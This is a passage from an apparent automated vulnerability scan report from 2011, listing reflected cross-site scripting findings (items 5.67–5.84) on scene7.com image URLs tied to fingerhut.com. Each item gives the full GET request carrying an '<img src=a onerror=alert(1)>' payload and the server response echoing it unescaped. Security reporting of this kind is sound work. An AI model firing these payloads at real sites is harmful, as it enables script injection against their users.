User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 87
Expires: Mon, 16 May 2011 01:36:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:36:56 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/F0042_VA_9992404c<img src=a onerror=alert(1)>637bf066978

5.67. http://s7d5.scene7.com/is/image/bluestembrands/F1900_VA_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/F1900_VA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f9733<img%20src%3da%20onerror%3dalert(1)>2808e4fabf2 was submitted in the REST URL parameter 4. This input was echoed as f9733<img src=a onerror=alert(1)>2808e4fabf2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/F1900_VA_999f9733<img%20src%3da%20onerror%3dalert(1)>2808e4fabf2?$ShoppingCart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 87
Expires: Mon, 16 May 2011 01:37:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:37:01 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/F1900_VA_999f9733<img src=a onerror=alert(1)>2808e4fabf2

5.68. http://s7d5.scene7.com/is/image/bluestembrands/F1962_VB_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/F1962_VB_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 83e01<img%20src%3da%20onerror%3dalert(1)>bd98f124f92 was submitted in the REST URL parameter 4. This input was echoed as 83e01<img src=a onerror=alert(1)>bd98f124f92 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/F1962_VB_99983e01<img%20src%3da%20onerror%3dalert(1)>bd98f124f92?$ShoppingCart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 87
Expires: Mon, 16 May 2011 01:36:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:36:36 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/F1962_VB_99983e01<img src=a onerror=alert(1)>bd98f124f92

5.69. http://s7d5.scene7.com/is/image/bluestembrands/F2553_WM1_400 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/F2553_WM1_400

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e4ff5<img%20src%3da%20onerror%3dalert(1)>ff41e0ca3e9 was submitted in the REST URL parameter 4. This input was echoed as e4ff5<img src=a onerror=alert(1)>ff41e0ca3e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/F2553_WM1_400e4ff5<img%20src%3da%20onerror%3dalert(1)>ff41e0ca3e9?$ShoppingCart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 88
Expires: Mon, 16 May 2011 01:36:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:36:54 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/F2553_WM1_400e4ff5<img src=a onerror=alert(1)>ff41e0ca3e9

5.70. http://s7d5.scene7.com/is/image/bluestembrands/F5676_VA_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/F5676_VA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cd5b3<img%20src%3da%20onerror%3dalert(1)>f878d452a5d was submitted in the REST URL parameter 4. This input was echoed as cd5b3<img src=a onerror=alert(1)>f878d452a5d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/F5676_VA_999cd5b3<img%20src%3da%20onerror%3dalert(1)>f878d452a5d?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 87
Expires: Mon, 16 May 2011 01:38:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:38:37 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/F5676_VA_999cd5b3<img src=a onerror=alert(1)>f878d452a5d

5.71. http://s7d5.scene7.com/is/image/bluestembrands/F6580_WM1_400 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/F6580_WM1_400

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4aa71<img%20src%3da%20onerror%3dalert(1)>1a9d311f4da was submitted in the REST URL parameter 4. This input was echoed as 4aa71<img src=a onerror=alert(1)>1a9d311f4da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/F6580_WM1_4004aa71<img%20src%3da%20onerror%3dalert(1)>1a9d311f4da?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 88
Expires: Mon, 16 May 2011 01:37:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:37:27 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/F6580_WM1_4004aa71<img src=a onerror=alert(1)>1a9d311f4da

5.72. http://s7d5.scene7.com/is/image/bluestembrands/F8394_WM1_400 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/F8394_WM1_400

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a8590<img%20src%3da%20onerror%3dalert(1)>cea58b0fddf was submitted in the REST URL parameter 4. This input was echoed as a8590<img src=a onerror=alert(1)>cea58b0fddf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/F8394_WM1_400a8590<img%20src%3da%20onerror%3dalert(1)>cea58b0fddf?$ShoppingCart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 88
Expires: Mon, 16 May 2011 01:36:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:36:58 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/F8394_WM1_400a8590<img src=a onerror=alert(1)>cea58b0fddf

5.73. http://s7d5.scene7.com/is/image/bluestembrands/NA908_WM1_400 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NA908_WM1_400

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b6dec<img%20src%3da%20onerror%3dalert(1)>f0004a86363 was submitted in the REST URL parameter 4. This input was echoed as b6dec<img src=a onerror=alert(1)>f0004a86363 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NA908_WM1_400b6dec<img%20src%3da%20onerror%3dalert(1)>f0004a86363?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 88
Expires: Mon, 16 May 2011 01:37:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:37:38 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NA908_WM1_400b6dec<img src=a onerror=alert(1)>f0004a86363

5.74. http://s7d5.scene7.com/is/image/bluestembrands/NB750_WVA_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NB750_WVA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 86ccf<img%20src%3da%20onerror%3dalert(1)>60ec1845695 was submitted in the REST URL parameter 4. This input was echoed as 86ccf<img src=a onerror=alert(1)>60ec1845695 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NB750_WVA_99986ccf<img%20src%3da%20onerror%3dalert(1)>60ec1845695?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 88
Expires: Mon, 16 May 2011 01:37:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:37:46 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NB750_WVA_99986ccf<img src=a onerror=alert(1)>60ec1845695

5.75. http://s7d5.scene7.com/is/image/bluestembrands/NC208_WM1_400 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NC208_WM1_400

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 404ad<img%20src%3da%20onerror%3dalert(1)>62a27b752f2 was submitted in the REST URL parameter 4. This input was echoed as 404ad<img src=a onerror=alert(1)>62a27b752f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NC208_WM1_400404ad<img%20src%3da%20onerror%3dalert(1)>62a27b752f2?$ShoppingCart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 88
Expires: Mon, 16 May 2011 01:37:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:37:24 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NC208_WM1_400404ad<img src=a onerror=alert(1)>62a27b752f2

5.76. http://s7d5.scene7.com/is/image/bluestembrands/NC330_VA_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NC330_VA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 18191<img%20src%3da%20onerror%3dalert(1)>ab0ea8c729c was submitted in the REST URL parameter 4. This input was echoed as 18191<img src=a onerror=alert(1)>ab0ea8c729c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NC330_VA_99918191<img%20src%3da%20onerror%3dalert(1)>ab0ea8c729c?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 87
Expires: Mon, 16 May 2011 01:37:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:37:28 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NC330_VA_99918191<img src=a onerror=alert(1)>ab0ea8c729c

5.77. http://s7d5.scene7.com/is/image/bluestembrands/NC364_VA_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NC364_VA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b8d30<img%20src%3da%20onerror%3dalert(1)>fb38cf8420b was submitted in the REST URL parameter 4. This input was echoed as b8d30<img src=a onerror=alert(1)>fb38cf8420b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NC364_VA_999b8d30<img%20src%3da%20onerror%3dalert(1)>fb38cf8420b?$ShoppingCart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 87
Expires: Mon, 16 May 2011 01:37:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:37:05 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NC364_VA_999b8d30<img src=a onerror=alert(1)>fb38cf8420b

5.78. http://s7d5.scene7.com/is/image/bluestembrands/NC873_WM1_400 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NC873_WM1_400

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ed961<img%20src%3da%20onerror%3dalert(1)>74de159628d was submitted in the REST URL parameter 4. This input was echoed as ed961<img src=a onerror=alert(1)>74de159628d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NC873_WM1_400ed961<img%20src%3da%20onerror%3dalert(1)>74de159628d?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 88
Expires: Mon, 16 May 2011 01:37:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:37:42 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NC873_WM1_400ed961<img src=a onerror=alert(1)>74de159628d

5.79. http://s7d5.scene7.com/is/image/bluestembrands/ND797_VA_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/ND797_VA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4cb2f<img%20src%3da%20onerror%3dalert(1)>9829a3c9865 was submitted in the REST URL parameter 4. This input was echoed as 4cb2f<img src=a onerror=alert(1)>9829a3c9865 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/ND797_VA_9994cb2f<img%20src%3da%20onerror%3dalert(1)>9829a3c9865?$ShoppingCart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 87
Expires: Mon, 16 May 2011 01:36:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:36:32 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/ND797_VA_9994cb2f<img src=a onerror=alert(1)>9829a3c9865

5.80. http://s7d5.scene7.com/is/image/bluestembrands/ND877_A_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/ND877_A_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 10ce7<img%20src%3da%20onerror%3dalert(1)>0733927d8c7 was submitted in the REST URL parameter 4. This input was echoed as 10ce7<img src=a onerror=alert(1)>0733927d8c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/ND877_A_99910ce7<img%20src%3da%20onerror%3dalert(1)>0733927d8c7?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 86
Expires: Mon, 16 May 2011 01:38:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:38:45 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/ND877_A_99910ce7<img src=a onerror=alert(1)>0733927d8c7

5.81. http://s7d5.scene7.com/is/image/bluestembrands/NE440_WM1_400 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NE440_WM1_400

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 917c4<img%20src%3da%20onerror%3dalert(1)>5834b878d03 was submitted in the REST URL parameter 4. This input was echoed as 917c4<img src=a onerror=alert(1)>5834b878d03 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NE440_WM1_400917c4<img%20src%3da%20onerror%3dalert(1)>5834b878d03?$ShoppingCart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 88
Expires: Mon, 16 May 2011 01:36:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:36:26 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NE440_WM1_400917c4<img src=a onerror=alert(1)>5834b878d03

5.82. http://s7d5.scene7.com/is/image/bluestembrands/NE682_WVA_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NE682_WVA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 53aaa<img%20src%3da%20onerror%3dalert(1)>858eeabeb94 was submitted in the REST URL parameter 4. This input was echoed as 53aaa<img src=a onerror=alert(1)>858eeabeb94 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NE682_WVA_99953aaa<img%20src%3da%20onerror%3dalert(1)>858eeabeb94?$ShoppingCart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 88
Expires: Mon, 16 May 2011 01:36:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:36:38 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NE682_WVA_99953aaa<img src=a onerror=alert(1)>858eeabeb94

5.83. http://s7d5.scene7.com/is/image/bluestembrands/NE967_WM1_400 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NE967_WM1_400

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6168f<img%20src%3da%20onerror%3dalert(1)>e1501599207 was submitted in the REST URL parameter 4. This input was echoed as 6168f<img src=a onerror=alert(1)>e1501599207 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NE967_WM1_4006168f<img%20src%3da%20onerror%3dalert(1)>e1501599207?$ShoppingCart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 88
Expires: Mon, 16 May 2011 01:36:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:36:12 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NE967_WM1_4006168f<img src=a onerror=alert(1)>e1501599207

5.84. http://s7d5.scene7.com/is/image/bluestembrands/NH642_VA_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NH642_VA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f4083<img%20src%3da%20onerror%3dalert(1)>f0bf3cf58c5 was submitted in the REST URL parameter 4. This input was echoed as f4083<img src=a onerror=alert(1)>f0bf3cf58c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NH642_VA_999f4083<img%20src%3da%20onerror%3dalert(1)>f0bf3cf58c5?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 87
Expires: Mon, 16 May 2011 01:38:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:38:43 GMT
Connection: close
X-N: S

